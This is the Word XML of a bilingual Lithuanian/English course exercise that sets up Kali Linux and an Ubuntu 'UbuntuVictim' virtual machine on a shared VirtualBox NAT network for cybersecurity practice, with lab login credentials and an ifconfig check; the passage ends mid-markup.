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1CB12" w14:textId="7FD4C7A6" w:rsidR="009F406B" w:rsidRPr="00352171" w:rsidRDefault="005E23AA" w:rsidP="005E23AA">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>Užduotis Nr. 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>(Exercise 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722CA209" w14:textId="77777777" w:rsidR="005E23AA" w:rsidRPr="00352171" w:rsidRDefault="005E23AA" w:rsidP="005E23AA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="327E9017" w14:textId="3DF9B029" w:rsidR="005E23AA" w:rsidRPr="00352171" w:rsidRDefault="005E23AA" w:rsidP="005E23AA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>Kali Linux bei Ubuntu sistemų pridėjimas į VirtualBox</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>(Adding Kali Linux and Ubuntu systems to VirtualBox)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B34B82" w14:textId="77777777" w:rsidR="005E23AA" w:rsidRPr="00352171" w:rsidRDefault="005E23AA" w:rsidP="005E23AA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C1B848C" w14:textId="77777777" w:rsidR="005E23AA" w:rsidRPr="00352171" w:rsidRDefault="005E23AA" w:rsidP="005E23AA">
      <w:r w:rsidRPr="00352171">
        <w:t>LT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEAC05F" w14:textId="454050A0" w:rsidR="005E23AA" w:rsidRPr="00352171" w:rsidRDefault="005E23AA" w:rsidP="005E23AA">
      <w:r w:rsidRPr="00352171">
        <w:t>Šioje užduotyje į VirtualBox aplinką buvo pridėtos dvi operacinės sistemos – Kali Linux ir Ubuntu. Tikslas – pasiruošti virtualias mašinas darbui su kibernetinio saugumo bei sistemų administravimo praktinėmis užduotimis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3599C43E" w14:textId="77777777" w:rsidR="005E23AA" w:rsidRPr="00352171" w:rsidRDefault="005E23AA" w:rsidP="005E23AA">
      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78904214" w14:textId="02357F63" w:rsidR="005E23AA" w:rsidRPr="00352171" w:rsidRDefault="005E23AA" w:rsidP="005E23AA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>In this task, two operating systems – Kali Linux and Ubuntu – were added to the VirtualBox environment. The goal was to prepare virtual machines for cybersecurity and system administration practice tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12587322" w14:textId="77777777" w:rsidR="005E23AA" w:rsidRPr="00352171" w:rsidRDefault="005E23AA" w:rsidP="005E23AA"/>
    <w:p w14:paraId="406E39C6" w14:textId="144D70BB" w:rsidR="005E23AA" w:rsidRPr="00352171" w:rsidRDefault="005E23AA" w:rsidP="005E23AA">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79EA794A" wp14:editId="6300750E">
            <wp:extent cx="6645910" cy="2191385"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="129307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257" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2191385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF9F387" w14:textId="1634F7C5" w:rsidR="005E23AA" w:rsidRPr="00352171" w:rsidRDefault="005E23AA" w:rsidP="005E23AA">
      <w:r w:rsidRPr="00352171">
        <w:t>LT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11282309" w14:textId="4C846E6F" w:rsidR="005E23AA" w:rsidRPr="00352171" w:rsidRDefault="005E23AA" w:rsidP="005E23AA">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">Spaudžiame </w:t>
      </w:r>
      <w:r w:rsidR="00C150CC" w:rsidRPr="00352171">
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>Open</w:t>
      </w:r>
      <w:r w:rsidR="00C150CC" w:rsidRPr="00352171">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve"> bei atidarome atsisiųstą Kali-Linux mašinos failą .vbox. Toliau nieko daryti nereikia, kadangi failas jau yra automatiškai sukonfigūruotas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352F483C" w14:textId="207A1088" w:rsidR="005E23AA" w:rsidRPr="00352171" w:rsidRDefault="005E23AA" w:rsidP="005E23AA">
      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D24E005" w14:textId="44A3E51D" w:rsidR="005E23AA" w:rsidRPr="00352171" w:rsidRDefault="005E23AA" w:rsidP="005E23AA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidR="003B231E" w:rsidRPr="00352171">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>Open</w:t>
      </w:r>
      <w:r w:rsidR="00C150CC" w:rsidRPr="00352171">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve"> and select the downloaded Kali-Linux.vbox file. No additional steps are necessary — the VM is preconfigured and ready to use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792137D8" w14:textId="77777777" w:rsidR="00B60E1C" w:rsidRPr="00352171" w:rsidRDefault="00B60E1C"/>
    <w:p w14:paraId="7F612EF3" w14:textId="377687C6" w:rsidR="005E23AA" w:rsidRPr="00352171" w:rsidRDefault="004F240E" w:rsidP="005E23AA">
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04D9FBE1" wp14:editId="391360D4">
            <wp:extent cx="6645910" cy="1258570"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="140255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7090" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1258570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDB6C16" w14:textId="711AFFEA" w:rsidR="00C150CC" w:rsidRPr="00352171" w:rsidRDefault="00C150CC" w:rsidP="005E23AA">
      <w:r w:rsidRPr="00352171">
        <w:t>LT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18085583" w14:textId="522D5080" w:rsidR="00C150CC" w:rsidRPr="00352171" w:rsidRDefault="00C150CC" w:rsidP="005E23AA">
      <w:r w:rsidRPr="00352171">
        <w:t>Spaudžiate „New“ ir į „VM Name“ įrašote „</w:t>
      </w:r>
      <w:r w:rsidR="004F240E" w:rsidRPr="00352171">
        <w:t>UbuntuVictim</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>“ ir „ISO Image“ pasirenkate atsisiųstą Ubuntu.iso failą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607286B9" w14:textId="5A1A7A20" w:rsidR="00C150CC" w:rsidRPr="00352171" w:rsidRDefault="00C150CC" w:rsidP="005E23AA">
      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC4A332" w14:textId="2B579DCE" w:rsidR="00C150CC" w:rsidRPr="00352171" w:rsidRDefault="00C150CC" w:rsidP="005E23AA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>Select “New”, name the virtual machine “</w:t>
      </w:r>
      <w:r w:rsidR="004F240E" w:rsidRPr="00352171">
        <w:t xml:space="preserve"> UbuntuVictim</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>”, and choose the downloaded Ubuntu.iso as the ISO image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431BBD21" w14:textId="77777777" w:rsidR="00B60E1C" w:rsidRPr="00352171" w:rsidRDefault="00B60E1C" w:rsidP="005E23AA"/>
    <w:p w14:paraId="2084901E" w14:textId="13275572" w:rsidR="00C150CC" w:rsidRPr="00352171" w:rsidRDefault="00C150CC" w:rsidP="005E23AA">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6705B161" wp14:editId="5CF8EEF5">
            <wp:extent cx="6645910" cy="3119120"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="2111615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15083" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="3119120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3080C099" w14:textId="66A98663" w:rsidR="00C150CC" w:rsidRPr="00352171" w:rsidRDefault="00C150CC" w:rsidP="005E23AA">
      <w:r w:rsidRPr="00352171">
        <w:t>LT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDFFB1E" w14:textId="7EAD2D4D" w:rsidR="00C150CC" w:rsidRPr="00352171" w:rsidRDefault="00C150CC" w:rsidP="005E23AA">
      <w:r w:rsidRPr="00352171">
        <w:t>Kitoje skiltyje „User Name“ paliekate toks, koks buvo priskirtas, o slaptažodį priskirkite „admin“</w:t>
      </w:r>
      <w:r w:rsidR="003B231E" w:rsidRPr="00352171">
        <w:t xml:space="preserve"> ir tada spaudžiate „Finish“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F469D0" w14:textId="7C693D1D" w:rsidR="00C150CC" w:rsidRPr="00352171" w:rsidRDefault="00C150CC" w:rsidP="005E23AA">
      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D2EAC7" w14:textId="77777777" w:rsidR="00B60E1C" w:rsidRPr="00352171" w:rsidRDefault="003B231E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>Leave the “User Name” as it was assigned, set the password to “admin”, and then click “Finish”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C832400" w14:textId="40A2A2E0" w:rsidR="003B231E" w:rsidRPr="00352171" w:rsidRDefault="003B231E">
      <w:r w:rsidRPr="00352171">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E505C11" w14:textId="28996815" w:rsidR="003B231E" w:rsidRPr="00352171" w:rsidRDefault="003B231E" w:rsidP="003B231E">
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="203AB629" wp14:editId="323D355A">
            <wp:extent cx="3858163" cy="2295845"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="858457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7205" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3858163" cy="2295845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DA3A9A" w14:textId="2A5985AE" w:rsidR="00123800" w:rsidRPr="00352171" w:rsidRDefault="00123800" w:rsidP="003B231E">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="476A3E59" wp14:editId="1DDB85A5">
            <wp:extent cx="3429479" cy="1333686"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1716848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48481" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3429479" cy="1333686"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AB8FC9" w14:textId="5B4D4446" w:rsidR="00123800" w:rsidRPr="00352171" w:rsidRDefault="00123800" w:rsidP="003B231E">
      <w:r w:rsidRPr="00352171">
        <w:t>LT: Spaudžiate ant „Network“ skilties, atidarote „NAT Networks“ skirtuką ir paspaudžiate „Create“. Tuomet paspaudžiate „Properties“ ir pažymite varnelę ant „Enable DHCP“ tam, kad jums priskirtų adresus automatiškai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102248AA" w14:textId="4A510749" w:rsidR="00123800" w:rsidRPr="00352171" w:rsidRDefault="00123800" w:rsidP="003B231E">
      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475D2E8A" w14:textId="37F64D29" w:rsidR="00123800" w:rsidRPr="00352171" w:rsidRDefault="00123800" w:rsidP="003B231E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>Click on the “Network” section, open the “NAT Networks” tab, and press “Create”. Then click “Properties” and check the “Enable DHCP” box to allow automatic address assignment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA60A75" w14:textId="77777777" w:rsidR="00B60E1C" w:rsidRPr="00352171" w:rsidRDefault="00B60E1C" w:rsidP="003B231E"/>
    <w:p w14:paraId="7A021B5E" w14:textId="46DC1220" w:rsidR="00123800" w:rsidRPr="00352171" w:rsidRDefault="00123800" w:rsidP="003B231E">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03B01D1C" wp14:editId="5A574D98">
            <wp:extent cx="6645910" cy="461645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="95782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4975" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="461645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C1D6BA" w14:textId="1F88F7F8" w:rsidR="00123800" w:rsidRPr="00352171" w:rsidRDefault="00123800" w:rsidP="003B231E">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="649DA156" wp14:editId="011B3B6F">
            <wp:extent cx="5509550" cy="3332261"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="84427132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1321" name="Picture 1" descr="A computer screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5518883" cy="3337906"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F3CFA1" w14:textId="77777777" w:rsidR="00C150CC" w:rsidRPr="00352171" w:rsidRDefault="00C150CC" w:rsidP="005E23AA"/>
    <w:p w14:paraId="5C1DEC8B" w14:textId="77777777" w:rsidR="00747B68" w:rsidRPr="00352171" w:rsidRDefault="00123800" w:rsidP="00123800">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">LT: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069DE13A" w14:textId="78B8944B" w:rsidR="005E23AA" w:rsidRPr="00352171" w:rsidRDefault="00123800" w:rsidP="00123800">
      <w:r w:rsidRPr="00352171">
        <w:t>Grįžtate atgal į „Machines“ skiltį, pasirenkate „Kali-Linux“ mašiną, spaudžiate dešinį pelės mygtuką ir spaudžiate „Settings...“. Tada einate į „Network“ skiltį ir pasirenkate „Attached to“ &gt; „NAT Network“ bei spaudžiate „Ok“. Tą patį atliekate ir su „UbuntuVictim“ mašina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585B25D3" w14:textId="5B4B7446" w:rsidR="00747B68" w:rsidRPr="00352171" w:rsidRDefault="00747B68" w:rsidP="00123800">
      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529696A7" w14:textId="2CCF4BF0" w:rsidR="00747B68" w:rsidRPr="00352171" w:rsidRDefault="00747B68" w:rsidP="00747B68">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>Go back to the “Machines” section, select the “Kali-Linux” machine, right-click and choose “Settings...”, open “Network”, set Attached to &gt; NAT Network, and click OK; repeat the same for the “UbuntuVictim” machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D513EA3" w14:textId="77777777" w:rsidR="00B60E1C" w:rsidRPr="00352171" w:rsidRDefault="00B60E1C" w:rsidP="00747B68"/>
    <w:p w14:paraId="75852FAB" w14:textId="05A8B46B" w:rsidR="00747B68" w:rsidRPr="00352171" w:rsidRDefault="00747B68" w:rsidP="00123800">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="341E2525" wp14:editId="705F20C1">
            <wp:extent cx="3229426" cy="1829055"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="137252458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4585" name="Picture 1" descr="A screenshot of a chat&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3229426" cy="1829055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C65DFA" w14:textId="7A922757" w:rsidR="00747B68" w:rsidRPr="00352171" w:rsidRDefault="00A511AB" w:rsidP="00123800">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53FC28E5" wp14:editId="5E1BC01F">
            <wp:extent cx="6645910" cy="4455160"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="1574419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19972" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="4455160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4DE8EB" w14:textId="6E48349A" w:rsidR="00A511AB" w:rsidRPr="00352171" w:rsidRDefault="00A511AB" w:rsidP="00123800">
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6316DAA0" wp14:editId="4C28E4E7">
            <wp:extent cx="6645910" cy="5579745"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="173556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6241" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="5579745"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A28087" w14:textId="77777777" w:rsidR="00A511AB" w:rsidRPr="00352171" w:rsidRDefault="00A511AB" w:rsidP="00123800">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">LT: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFFF47B" w14:textId="74298BF4" w:rsidR="00A511AB" w:rsidRPr="00352171" w:rsidRDefault="00A511AB" w:rsidP="00123800">
      <w:r w:rsidRPr="00352171">
        <w:t>Pasileidžiate abi mašinas ir jose atidarote Terminal.</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t xml:space="preserve">* Jeigu prašys slaptažodžio: </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>kali : kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>vboxuser : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685F162B" w14:textId="50A368C0" w:rsidR="00A511AB" w:rsidRPr="00352171" w:rsidRDefault="00A511AB" w:rsidP="00123800">
      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4433A7" w14:textId="77777777" w:rsidR="00A511AB" w:rsidRPr="00352171" w:rsidRDefault="00A511AB" w:rsidP="00A511AB">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>Boot both VMs and open their Terminals; if a password is requested, use kali (password kali) or vboxuser (password admin).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D508E64" w14:textId="77777777" w:rsidR="00B60E1C" w:rsidRPr="00352171" w:rsidRDefault="00B60E1C" w:rsidP="00A511AB"/>
    <w:p w14:paraId="33F671C2" w14:textId="65A7EE38" w:rsidR="00A511AB" w:rsidRPr="00352171" w:rsidRDefault="00A511AB" w:rsidP="00123800"/>
    <w:p w14:paraId="766AC7A0" w14:textId="77777777" w:rsidR="00A511AB" w:rsidRPr="00352171" w:rsidRDefault="00A511AB">
      <w:r w:rsidRPr="00352171">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7C968A" w14:textId="375A7741" w:rsidR="00A511AB" w:rsidRPr="00352171" w:rsidRDefault="00A511AB" w:rsidP="00123800">
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="249DC7E4" wp14:editId="46C32C5F">
            <wp:extent cx="6257925" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="986740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0282" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6257925" cy="1066800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7616BF89" w14:textId="6847A9D5" w:rsidR="00A511AB" w:rsidRPr="00352171" w:rsidRDefault="00A511AB" w:rsidP="00123800">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="204B4E43" wp14:editId="52E2F6FA">
            <wp:extent cx="6181725" cy="1152525"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="11653015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01513" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6181725" cy="1152525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0231D7" w14:textId="77777777" w:rsidR="00B60E1C" w:rsidRPr="00352171" w:rsidRDefault="00A511AB" w:rsidP="00123800">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">LT: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D31BE7" w14:textId="0E8FCEEE" w:rsidR="00A511AB" w:rsidRPr="00352171" w:rsidRDefault="00A511AB" w:rsidP="00123800">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">Abiejose mašinose įrašote „ifconfig“ ir spaudžiate ENTER. Jeigu jūsų „inet“ adresas prasideda 10.0.2... tai reiškia, jog jūsų </w:t>
      </w:r>
      <w:r w:rsidR="00B60E1C" w:rsidRPr="00352171">
        <w:t>abiejų mašinų virtualus tinklas buvo nustatytas teisingai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4483C7AB" w14:textId="05ED0EEF" w:rsidR="00B60E1C" w:rsidRPr="00352171" w:rsidRDefault="00B60E1C" w:rsidP="00123800">
